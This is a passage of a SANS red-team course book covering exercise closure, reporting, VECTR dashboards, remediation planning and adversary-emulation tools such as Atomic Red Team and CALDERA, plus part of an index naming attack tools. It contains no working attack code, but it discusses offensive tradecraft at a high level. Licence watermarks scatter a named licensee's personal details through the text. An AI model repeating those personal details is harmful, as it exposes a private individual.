090aff33bcb6e401ded410120bc9a268 Initial Access Lab 2.1: Delivery and Initial Access Network Propagation Discovery Privilege Escalation Persistence Lab 2.2: Discovery, Privilege Escalation, and Persistence Defense Evasion and Execution Credential Access Lateral Movement and Pivoting Lab 2.3: Defense Evasion, Credential Access, and Pivoting Action on Objectives Target Manipulation, Collection, and Exfiltration Lab 2.4: Action on Objectives Exercise Closure Analysis and Response Reporting Remediation and Action Plan Lab 2.5: Exercise Closure

26 ,2 02 0

• Day 1: Introduction and Planning of Red Team Exercises • Day 2: Red Team Exercise Execution and Closure

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

120

ak

er

@ ya

ho

22829180 i< an

nm

This page intentionally left blank.

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

120

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Report

090aff33bcb6e401ded410120bc9a268 Always write a report; it may be referenced years from now! Title Page Executive Summary

Attack Narrative



– Attack diagram – List of critical steps

– Goals and Objective – Top Findings

26 ,2 02 0

• •

Analysis and Response



[email protected] Ap ril

– Report the good, too!

Methodology/Framework Planning

• •

Red Team Findings



– People, Process, and Technology – Tactical and Strategic

m

co

Conclusion

o.



Threat Intelligence

22829180

SEC564 | Red Team Exercises and Adversary Emulation

121

ak

er

@ ya

ho



>

– Engagement scenario and scope details – Rules of Engagement details

i< an

nm

Report Always write a report, even for a smaller Red Team exercise covering only a few test cases or TTPs. These reports are often all that is seen by certain stakeholders and should cover the entire effort. There are many examples available on the GitHub page in the reference. A Red Team Report should have the following:

• •

ze

Lincoln Mazzei ln

M

az

Title Page: Clean and neat first page with name of exercise and companies involved. Executive Summary: Cover the basic top-level items that senior managers will read and walk out with. Methodology/Framework: Cover the methodology and framework used. Planning: The project manager should complete this portion covering the scenario and scope details as well as the Rules of Engagement. Threat Intelligence: Include the threat intelligence report or at least the executive summary. Attack Narrative: This should be a story of how the Red Team started and progressed through the objective. Analysis and Response: The Project Manager should ensure this area is accurate and accounts for all Trusted Agent provided data. Report the TTPs that were blocked and alerted, not just the things that did not get caught! Red Team Findings: Split by People, Process, and Technology as well as Tactical and Strategic. Conclusion: Do not introduce anything new here. Thank all the stakeholders.

nc o

• • • •

To :

ce

Li

• •

ns

ed



Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Reference: https://github.com/juliocesarfort/public-pentesting-reports

live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

121

© SANS Institute 2020

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

122

ak

er

@ ya

ho

22829180 i< an

nm

VECTR Narrative, Timeline, and Test Cases This slide is a screenshot of a completed Adversary Emulation Red Team Exercise with the Analysis and Response completed. The top-left diagram shows the escalation path or attack narrative mapped to the ATT&CK Framework. This is a great visual representation of how everything came together for Red Team to achieve the objective. The top right shows the timeline of events for both Red and Blue Team actions. The bottom left has the test cases split by phase, test status, and outcome. The bottom right has an easy-to-read pie chart that covers what was detected and not detected.

M

az

ze

Lincoln Mazzei nc o

ln

Reference: https://vectr.io/

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

122

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

123

ak

er

@ ya

ho

22829180 i< an

nm

VECTR Summary This VECTR screenshot dives deeper into the assessment for the Blue Team and stakeholders to view. It splits the campaigns up with most and least successful on the top right of the screen. This will allow senior stakeholders and decision makers to focus budget, time, and training on certain TTPs that are continuously used and not getting caught. The bottom shows the statistics based on the Detection/Prevention tools. This shows product owners what tool is providing the most value and in which phase of the Unified Kill Chain.

az

ze

Lincoln Mazzei nc o

ln

M

Reference: https://vectr.io/

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

123

© SANS Institute 2020

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

124

ak

er

@ ya

ho

22829180 i< an

nm

VECTR Heatmap This screenshot from VECTR shows the ATT&CK Heat Map for the Red Team campaigns performed. While it looks similar to ATT&CK Navigator, it goes one step deeper by showing the various Procedures (Test Cases) that were tested and the color codes are based on the percent of detected and not detected. This is a great additional step forward as we can focus on procedures and not just the Tactics and Techniques.

az

ze

Lincoln Mazzei nc o

ln

M

Reference: https://vectr.io/

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

124

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 VECTR Historical Trending

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

125

ak

er

@ ya

ho

22829180 i< an

nm

VECTR Historical Trending This last VECTR screenshot is once multiple Red Team Exercises have been completed. It shows a trend of improvement overtime, which is a very important metric for senior management and stakeholders. It shows the value that Red Team Exercises have provided over time.

ze

Lincoln Mazzei nc o

ln

M

az

Reference: https://vectr.io/

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

125

© SANS Institute 2020 Course Roadmap

Remediation and Action Plan

090aff33bcb6e401ded410120bc9a268 Initial Access Lab 2.1: Delivery and Initial Access Network Propagation Discovery Privilege Escalation Persistence Lab 2.2: Discovery, Privilege Escalation, and Persistence Defense Evasion and Execution Credential Access Lateral Movement and Pivoting Lab 2.3: Defense Evasion, Credential Access, and Pivoting Action on Objectives Target Manipulation, Collection, and Exfiltration Lab 2.4: Action on Objectives Exercise Closure Analysis and Response Reporting Remediation and Action Plan Lab 2.5: Exercise Closure

26 ,2 02 0

• Day 1: Introduction and Planning of Red Team Exercises • Day 2: Red Team Exercise Execution and Closure

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

126

ak

er

@ ya

ho

22829180 i< an

nm

This page intentionally left blank.

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

126

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Remediation and Action Plan

090aff33bcb6e401ded410120bc9a268 • Project Manager should take lead to obtain recommendations 26 ,2 02 0

• Split by people, process, and technology; tactical and strategic • Issue owners should ultimately choose and accept action plan – Red and Blue Team provides recommendations – Technology owners will choose how to remediate and accept milestones

[email protected] >

Ap ril

• Continue to track the issues and perform retests to close items • Don’t forget Lessons Learned for the exercise team

o.

co

m

– Constant state of improvement – If you do not stay one step ahead of the game, you will be left behind SEC564 | Red Team Exercises and Adversary Emulation

127

ak

er

@ ya

ho

22829180 i< an

nm

Remediation and Action Plan Although the final step of an Adversary Emulation Red Team Exercise, the work is just starting for those that will own the remediation action plan. The project manager should take the lead in obtaining recommendations from the Trusted Agents and the proposed remediation action plan owners. It is important to ensure the owners accept the recommendations as they will be responsible for ensuring implementation following the suggested timelines. It is a good idea to split the remediations in tactical (short term) and strategic (long term) recommendations as well as people, process, and technology. Many organizations may have the technology remediation part down due to years of vulnerability management experience, but the people and process issues may be new to deal with.

ln

M

az

ze

Lincoln Mazzei nc o

Lessons Learned The project manager should collect lessons learned of the exercise itself to improve on those areas in the following exercise. Some things to consider:

ed

ns

ce



Were the Trusted Agents the correct people that should be involved? Should others be added, or should some be removed on next round? Should planning activities begin before the Threat Intelligence portion? This may be the case for regulatory required tests.

Li



To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

127

© SANS Institute 2020 Example: Remediation and Action Plan

090aff33bcb6e401ded410120bc9a268 • People: Executive Administrator falls for spear phishing 26 ,2 02 0

– Tactical: Speak with the executive administrator; show what failed – Strategic: Implement a quarter social engineering program to actively test end users against emulated phishing attacks

• Process: Too long between detection and IR analyst assignment

[email protected] Ap ril

– Tactical: Manager receives notification when IR analyst not assigned – Strategic: Perform a Lean assessment to cut waste and improve time

m

>

• Technology: Outbound TCP 21 allowed

o.

co

– Tactical: Block or monitor TCP port 21 – Strategic: Perform assessment of allowed outbound connections SEC564 | Red Team Exercises and Adversary Emulation

128

ak

er

@ ya

ho

22829180 i< an

nm

Example: Remediation and Action Plan This slide covers an example for people, process, and technology broken up in tactical and strategic solutions. A Red Team exercise will reveal a number of issues spanning these areas and breaking them up will allow for easier assignment, ownership, and tracking.

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

128

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Retesting and Automated Red Team

090aff33bcb6e401ded410120bc9a268 Red Team may be asked to validate fixes 26 ,2 02 0

• Retesting technology issues is easier than people and process • Red Team may want to automate or simulate TTPs on a continuous basis

[email protected] o.

co

m

>

Ap ril

– APT Emulator – Network Flight Simulator – Atomic Red Team – MITRE Caldera – SCYTHE

SEC564 | Red Team Exercises and Adversary Emulation

129

ak

er

@ ya

ho

22829180 i< an

nm

Retesting and Automated Red Team The Red Team may be asked to retest a number of issues during the remediation phase. Testing technology issues is much easier than people and process. There are many products available for automating and retesting test cases and TTPs used in Red Team Exercises and Adversary Emulation. This slide lists a few to consider:

ln

M

az

ze

Lincoln Mazzei

APT Emulator Network Flight Simulator Atomic Red Team MITRE Caldera Scythe

nc o

• • • • •

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

129

© SANS Institute 2020 APT Simulator

090aff33bcb6e401ded410120bc9a268 • Windows-based tool that • •

26 ,2 02 0

makes a system look like it was victim of an attack Written by Florian Roth Supports a wide variety of the ATT&CK tactics Primarily built on BAT files Highly customizable

> m o.



co



Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

130

ak

er

@ ya

ho

22829180

Lincoln Mazzei az

ze

Endpoint detection and response tools Security monitoring capabilities Response effectiveness

M

• • •

i< an

nm

APT Simulator APT Simulator was written by Florian Roth (Nextron Systems) and was designed to test endpoints via Windows Batch scripts. This allows for automated retesting and continuous testing of:

nc o

ln

From its official documentation: “APT Simulator is a Windows Batch script that uses a set of tools and output files to make a system look as if it was compromised. In contrast to other adversary simulation tools, APT Simulator is designed to make the application as simple as possible. You don't need to run a web server, database or any agents on set of virtual machines. Just download the prepared archive, extract and run the contained Batch file as Administrator. Running APT Simulator takes less than a minute of your time.”

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

ed

Reference: https://github.com/NextronSystems/APTSimulator

live

130

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Network Flight Simulator (flightsim)

090aff33bcb6e401ded410120bc9a268 • Developed by alphasoc 26 ,2 02 0

• Focus on network-level detection • Supports a variety of suspicious network connectivity

Ap ril

[email protected] o.

co

m

>

– DNS Tunneling – Domain Generation Algorithms – Known bad domains – Tor

SEC564 | Red Team Exercises and Adversary Emulation

131

ak

er

@ ya

ho

22829180

Lincoln Mazzei M

az

ze

DNS tunneling Domain Generation Algorithms (DGA) Known bad domains Tor

ln

• • • •

i< an

nm

Network Flight Simulator (flightsim) While APTSimulator is mostly focused on endpoint controls, Network Flight Simulator (developed by alphasoc) focuses on network-level detection. It supports the simulation of a variety of suspicious network connectivity:

nc o

According to its official documentation: “flightsim is a lightweight utility used to generate malicious network traffic and help security teams to evaluate security controls and network visibility. The tool performs tests to simulate DNS tunneling, DGA traffic, requests to known active C2 destinations, and other suspicious traffic patterns.”

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

ed

Reference: https://github.com/alphasoc/flightsim

live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

131

© SANS Institute 2020 Atomic Red Team

090aff33bcb6e401ded410120bc9a268 26 ,2 02 0

Red Canary has developed “Atomic Red Team”, which is a series of “simple” tests that can be used to emulate the behavior of adversaries in the environment. All tests are fully linked to MITRE ATT&CK!

o.

co

m

>

Ap ril

[email protected]

SEC564 | Red Team Exercises and Adversary Emulation

132

ak

er

@ ya

ho

22829180 i< an

nm

Atomic Red Team The goal of Atomic Red Team (created by Red Canary) is to “allow every security team to test their controls by executing simple "atomic tests" that exercise the same techniques used by adversaries (all mapped to MITRE's ATT&CK).” This is very much in line with a purple team approach: Empower the blue team to test prevention and detection of various adversary techniques!

az

ze

Lincoln Mazzei ln

Teams need to be able to test everything from specific technical controls to outcomes. Our security teams do not want to operate with a “hopes and prayers” attitude toward detection. We need to know what our controls and program can detect, and what it cannot. We don’t have to detect every adversary, but we do believe in knowing our blind spots.

nc o



M

From its official GitHub page: “Three key beliefs made up the Atomic Red Team charter:

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK We should be able to run a test in less than five minutes. Most security tests and automation tools take a tremendous amount of time to install, configure, and execute. We coined the term "atomic tests" because we felt there was a simple way to decompose tests so most could be run in a few minutes. The best test is the one you actually run.



We need to keep learning how adversaries are operating. Most security teams don’t have the benefit of seeing a wide variety of adversary types and techniques crossing their desk every day. Even we at Red Canary only come across a fraction of the possible techniques being used, which makes the community working together essential to making us all better.”

Li

ce

ns

ed



live

References: https://github.com/redcanaryco/atomic-red-team https://atomicredteam.io/

132

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 MITRE™ CALDERA

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268

Ap ril

[email protected] o.

co

m

>

• CALDERA is a tool built by MITRE™, with the express purpose of doing adversary emulation • Actively “attack” target systems by deploying custom backdoors • Linked to the ATT&CK SEC564 | Red Team Exercises and Adversary Emulation

133

ak

er

@ ya

ho

22829180 i< an

nm

MITRE™ Caldera While the previously mentioned tools were rather “simple” to set up and configure, CALDERA is a bit different! It requires a bit of setup (as a server needs to be installed) and it will actively “attack” target systems by deploying custom backdoors. CALDERA’s attack steps are fully linked to the ATT&CK framework techniques.

ze

Lincoln Mazzei nc o

ln

M

az

From its official documentation: “CALDERA is an automated adversary emulation system that performs postcompromise adversarial behavior within Windows Enterprise networks. It generates plans during operation using a planning system and a pre-configured adversary model based on the Adversarial Tactics, Techniques & Common Knowledge (ATT&CK™) project. These features allow CALDERA to dynamically operate over a set of systems using variable behavior, which better represents how human adversaries perform operations than systems that follow prescribed sequences of actions.

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

ed

To :

CALDERA is useful for defenders who want to generate real data that represents how an adversary would typically behave within their networks. Since CALDERA's knowledge about a network is gathered during its operation and is used to drive its use of techniques to reach a goal, defenders can get a glimpse into how the intrinsic security dependencies of their network allow an adversary to be successful. CALDERA is useful for identifying new data sources, creating and refining behavioral-based intrusion detection analytics, testing defenses and security configurations, and generating experience for training.” Reference: https://github.com/mitre/caldera

live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

133

© SANS Institute 2020 SCYTHE

090aff33bcb6e401ded410120bc9a268 • Commercial tool for automated Red Team 26 ,2 02 0

• Covers most of the ATT&CK Framework • Threat Catalog and growing community • Final reports that you can ingest for technical analysis and executive summary reports showing kill chain and MITRE™ ATT&CK results • Many other BAS vendors:

Ap ril

[email protected] o.

co

m

>

– AttackIQ – SafeBreach – Verodin

SEC564 | Red Team Exercises and Adversary Emulation

134

ak

er

@ ya

ho

22829180 i< an

nm

SCYTHE SCYTHE enables organizations to continuously assess their risk posture and exposure. SCYTHE combines breach and attack simulation features with vulnerability assessment and penetration testing capabilities to deliver the ability to continuously assess the security posture of an entire organization without the need for costly training, technical expertise, or complex setup.

az

ze

Lincoln Mazzei

AttackIQ SafeBreach Verodin

nc o

• • •

ln

M

There are many vendors in this new space often called Breach and Attack Simulation (BAS). Some solutions have agents that need to be deployed on the endpoints while others are virtual machines:

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

ed

References: https://www.scythe.io/ https://www.esecurityplanet.com/products/top-breach-and-attack-simulation-bas-vendors.html

live

134

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Course Roadmap

Lab 2.5: Exercise Closure

090aff33bcb6e401ded410120bc9a268 Initial Access Lab 2.1: Delivery and Initial Access Network Propagation Discovery Privilege Escalation Persistence Lab 2.2: Discovery, Privilege Escalation, and Persistence Defense Evasion and Execution Credential Access Lateral Movement and Pivoting Lab 2.3: Defense Evasion, Credential Access, and Pivoting Action on Objectives Target Manipulation, Collection, and Exfiltration Lab 2.4: Action on Objectives Exercise Closure Analysis and Response Reporting Remediation and Action Plan Lab 2.5: Exercise Closure

26 ,2 02 0

• Day 1: Introduction and Planning of Red Team Exercises • Day 2: Red Team Exercise Execution and Closure

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

135

ak

er

@ ya

ho

22829180 i< an

nm

This page intentionally left blank.

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

135

© SANS Institute 2020 Click2.5 To| Edit Master Title Style Lab Exercise Closure

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268 Please work on the lab exercise Lab 2.5 | Exercise Closure

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

136

ak

er

@ ya

ho

22829180 i< an

nm

This page intentionally left blank.

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

136

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Conclusion for 564.2

090aff33bcb6e401ded410120bc9a268 This concludes SEC564: Red Team Exercises and Adversary Emulation! – Initial Access – Defense Evasion – Network Propagation – Lateral Movement

Closure

26 ,2 02 0

• Exercise Execution Threat Intelligence

Ap ril

[email protected]

• Exercise Closure

Testing

o.

co

m

>

– Analysis and Response – Reporting – Remediation and Action Plan

Planning

SEC564 | Red Team Exercises and Adversary Emulation

137

ak

er

@ ya

ho

22829180 i< an

nm

Conclusion for 564.2 This concludes SEC564: Red Team Exercises and Adversary Emulation!

Lincoln Mazzei nc o

ln

M

az

ze

We began introducing you to Red Team exercises and adversary emulations to show how they differ from other security testing types such as vulnerability assessments, penetration tests, and purple teaming. We covered a number of industry frameworks (including the Cyber Kill Chain, Unified Kill Chain, and ATT&CK, among others) for Red Team exercises and adversary emulations. Threat Intelligence is a main factor and trigger to performing Red Team exercises. A successful Red Teamer needs to know how to obtain and consume threat intelligence to successfully plan and execute an adversary emulation. We covered planning, learned what triggers an exercise and how to define objectives and scope, and set up attack infrastructure. We covered roles and responsibilities, including those of the trusted agents (White Team or Cell), and about establishing the rules of engagement. With a strong plan, an exercise execution phase can begin. We covered Red Team Planning and weaponization. Day 1 concluded with a hands-on lab emulating a chosen adversary against our own test environment before attempting initial access to the target environment.

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

Today, we started with obtaining Initial Access to the SEC564Tartget environment. Then we covered the network propagation phase of the Unified Kill Chain mapping Red Team steps to the MITRE™ ATT&CK framework. We covered a number of adversary tactics, techniques, and procedures for discovery, privilege escalation, persistence, defense evasion, execution, accessing credentials, lateral movement and pivoting. We then covered the action on the objectives phase of an adversary emulation where the Red Team achieves the exercise goals and objectives. Then we wrapped up the day with Exercise Closure. Here is where analysis and response is documented by correlating Blue Team data with the actions performed by the Red Team. We covered reporting and how to show Red Team Exercises and Adversary Emulation improve the overall security of the organization.

live

We sincerely hope you have found this course to be valuable allowing you to leverage what you have learned immediately upon returning to work.

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

137

© SANS Institute 2020 COURSE RESOURCES AND CONTACT INFORMATION

090aff33bcb6e401ded410120bc9a268 AUTHOR CONTACT Jorge Orchilles [email protected] Twitter: @JorgeOrchilles

26 ,2 02 0

SANS INSTITUTE 11200 Rockville Pike., Suite 200 N. Bethesda, MD 20852 301.654.SANS(7267)

Ap ril

[email protected] SANS EMAIL

GENERAL INQUIRIES: [email protected] REGISTRATION: [email protected] TUITION: [email protected] PRESS/PR: [email protected]

o.

co

m

>

PEN TESTING RESOURCES pen-testing.sans.org Twitter: @SANSPenTest

SEC564 | Red Team Exercises and Adversary Emulation

138

ak

er

@ ya

ho

22829180 i< an

nm

This page intentionally left blank.

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

138

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 A Actions on Objectives Active Directory (AD)

1:29 1:130, 2:18, 2:23, 2:31-36, 2:75, 2:80-81, 2:83-85, 2:97 1:113, 1:115 2:33-34 1:28, 1:33

Active Recon ADRecon Adversarial Attack Simulation Exercises (AASE) Adversary

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268 1:1, 1:6-7, 1:9, 1:14, 1:16-17, 1:19-22, 1:26, 1:28, 1:38, 1:40-41, 1:44-48, 1:50-57, 1:6169, 1:72, 1:74-76, 1:78-83, 1:87-89, 1:91, 1:95-98, 1:101, 1:107, 1:109, 1:119-120, 1:124-125, 1:140-141, 1:143, 1:148, 2:1, 2:7, 2:16, 2:19, 2:21, 2:38, 2:50-51, 2:78, 2:84, 2:94, 2:101, 2:103-104, 2:107, 2:111, 2:114-115, 2:119, 2:122, 2:127, 2:129-130, 2:132-133, 2:137 1:1, 1:6-7, 1:9, 1:16-17, 1:19-22, 1:26, 1:28, 1:41, 1:45-46, 1:48, 1:56-57, 1:61-65, 1:67, 1:69, 1:74, 1:76, 1:78, 1:80, 1:83, 1:91, 1:95-98, 1:101, 1:119-120, 1:124-125, 1:141, 1:143, 1:148, 2:1, 2:7, 2:111, 2:114115, 2:119, 2:122, 2:127, 2:129, 2:133, 2:137 1:41, 1:46, 1:57, 1:78, 1:97 1:11 2:59 2:69 2:129 2:130 1:114 2:24 1:28, 1:33 2:129, 2:132 1:7, 1:28, 1:38, 1:41, 1:45-46, 1:53-56, 1:68, 1:87, 1:97, 1:103, 1:107, 1:141, 1:148, 2:21, 2:50, 2:59, 2:63-64, 2:107, 2:122, 2:124, 2:132-133, 2:137 1:3, 1:7, 1:41, 1:75, 1:83, 1:86, 1:89-92, 1:94-96, 1:98-101, 1:103-105, 1:113, 1:124, 1:144, 1:148, 2:50, 2:112, 2:118, 2:137 2:134

o.

co

m

>

Ap ril

[email protected] ho

22829180 i< an

nm

ak

er

@ ya

Adversary Emulation

Adversary Emulation Plan AlientVault Anti-Exploit Antimalware Scan Interface (AMSI) APT Emulator APT Simulator AQUATONE arp Association of Banks of Singapore (ABS) Atomic Red Team ATT&CK

nc o

ln

M

az

ze

Lincoln Mazzei

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

Attack Infrastructure

live

AttackIQ

B Beacons BeautifulSoup

1:101, 1:130, 2:116 1:111

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 BeRoot BloodHound Blue Team

2:39 2:33-34, 2:36 1:14-15, 1:17, 1:20-21, 1:26, 1:38, 1:41, 1:53, 1:55, 1:79-84, 1:90, 1:97-101, 1:103, 1:105, 1:110, 1:113, 1:124, 1:127, 1:137, 1:140-141, 2:18, 2:20, 2:50, 2:59, 2:63, 2:69, 2:75, 2:83, 2:111-112, 2:114, 2:116119, 2:122-123, 2:127, 2:132, 2:137 1:99 2:134 1:76, 1:78, 1:83 1:99

090aff33bcb6e401ded410120bc9a268 26 ,2 02 0

Bluecoat Breach and Attack Simulation (BAS) Breach Notification BrightCloud

Ap ril

[email protected] >

C

1:134, 2:33-34, 2:36, 2:69-72 1:97 1:101 1:28, 1:30-31 2:69 1:99 1:22 1:96, 1:139 1:40, 1:49-50, 1:107, 1:137, 2:3, 2:36, 2:71, 2:78-79, 2:103-104, 2:106 1:7, 1:43, 1:54, 1:56, 1:82, 1:89, 1:95, 1:97, 1:99-101, 1:107, 1:124, 1:130, 1:132-134, 2:106 1:92 2:48

o.

co

m

C# C2 Matrix C2 Protocols CBEST Centralized Logging Cisco Talos Client-side test Cobalt Strike Collection

nm

ak

er

@ ya

ho

22829180 i< an

Command and Control (C2)

ze

Lincoln Mazzei nc o

ln

M

az

Commando VM Common Vulnerabilities and Exposures (CVE) Common Vulnerability Scoring System (CVSS) Constrained Language Content Delivery Network (CDN) Cracking CrackMapExec Credential Access

2:48 2:69 1:104 2:10, 2:76, 2:81, 2:87-89 2:97 1:40, 1:56, 1:107, 2:2-3, 2:6, 2:16, 2:75, 2:78, 2:86, 2:99, 2:103 1:7, 1:11, 1:40, 1:52, 1:89, 1:100, 1:107, 1:112, 1:116, 1:119, 1:124, 1:130-131, 2:6, 2:16, 2:24, 2:26, 2:30, 2:50, 2:75-78, 2:8081, 2:83-86, 2:89, 2:91, 2:93-95, 2:103, 2:137 1:30-31 1:31

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

Credentials

live CREST certified CREST Certified Simulated Attack Manager (CCSAM) CREST Certified Threat Intelligence Manager (CCTIM)

1:31

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Cryptanalysis attack Cyber Kill Chain (CKC)

1:22 1:7, 1:20, 1:28-29, 1:39, 1:57, 1:82, 1:148, 2:137 1:34

Cyber Resilience Assessment Framework (C-RAF)

090aff33bcb6e401ded410120bc9a268 D 2:105-106 1:116 2:81, 2:84 1:36, 1:82 1:81, 1:84, 1:105, 1:140 1:7, 1:39, 1:107, 1:135, 1:139, 2:2-3, 2:16, 2:24, 2:59-60, 2:62-63, 2:99, 2:137 1:4, 1:29, 1:40, 1:48, 1:104, 1:107, 1:129, 1:139, 1:143-145, 2:2, 2:6, 2:14, 2:69 1:29 1:1, 1:29, 1:34, 1:36-38, 1:47, 1:88, 1:95, 1:115, 2:8 1:113 1:100 1:7, 1:40, 1:56, 1:80, 1:107, 1:115, 1:137, 2:2, 2:16, 2:18-19, 2:21-23, 2:25-28, 2:30, 2:57, 2:71, 2:86, 2:91-92, 2:137 2:44-45 2:131 1:113 1:98, 1:103-104 2:131 1:51, 1:89, 1:99, 1:109, 1:114, 1:140 1:143 1:24-25 1:134, 1:145 1:131, 1:134, 1:137, 2:41-42, 2:44-45, 2:60, 2:64, 2:67

26 ,2 02 0

Data Staging Dataspolit DCSync De-chain Deconfliction Defense Evasion

>

Ap ril

[email protected] co

m

Delivery

o.

Dell SecureWorks Development

@ ya

ho

22829180 i< an

DLL Hijack DNS tunneling Dnsrecon Domain Fronting Domain Generation Algorithms (DGA) Domain Names DomainKeys Identified Mail (DKIM) Dridex Ducky Dynamic-Link Library (DLL)

nm

ak

er

dig Digital Certificates Discovery

nc o

ln

M

az

ze

Lincoln Mazzei

ce

E

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

Empire

1:95, 1:97, 1:130-139, 2:30, 2:35, 2:45, 2:66, 2:70, 2:78-79, 2:83, 2:85, 2:89, 2:93, 2:104, 2:116 2:23, 2:59, 2:130 1:111, 1:113, 2:18, 2:24, 2:27, 2:30, 2:3233, 2:35 1:24 1:9-11, 1:13, 1:69, 2:8 1:7, 1:39, 1:54, 1:107, 1:135, 1:139, 2:2-3,

live

Endpoint Detection and Response (EDR) Enumeration Equifax Ethical Hacking Evasion

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 2:16, 2:24, 2:59-60, 2:62-63, 2:68, 2:99, 2:137 1:128-129 1:7, 1:33, 1:73-74, 1:78-79, 1:148, 2:3, 2:111-112, 2:114, 2:136-137 1:40, 1:52-53, 1:96, 1:107, 1:137, 1:140, 2:3, 2:84, 2:103, 2:105-106 1:12-13, 1:29, 1:39-40, 1:49, 1:53, 1:68, 1:95-96, 1:103, 1:107, 1:128, 1:130, 1:137, 2:5, 2:7-8, 2:16, 2:24, 2:39, 2:48, 2:50, 2:97, 2:104

ExecutionPolicy Exercise Closure

090aff33bcb6e401ded410120bc9a268 Exfiltration

26 ,2 02 0

Exploitation

Ap ril

[email protected] 2:10, 2:86, 2:96, 2:105-106 1:30 1:30

co

m

>

File Transfer Protocol (FTP) Financial Conduct Authority (FCA) Financial Market Infrastructure Directorate (FMID) FOCA Fortiguard

1:114 1:99

o.

F

G

1:28, 1:35

i< an

nm

G-7 Fundamental Elements for ThreatLed Penetration Testing (G7FE-TLPT) GhostPack GitHarvester Global Financial Markets Association (GFMA) Google Dork Google Hacking Database (GHDB) Governance Group Policy Preferences (GPP) Grouper2 GroupPolicy

ak

er

@ ya

ho

22829180 2:34, 2:48, 2:71 1:111 1:28, 1:36

nc o

ln

M

az

ze

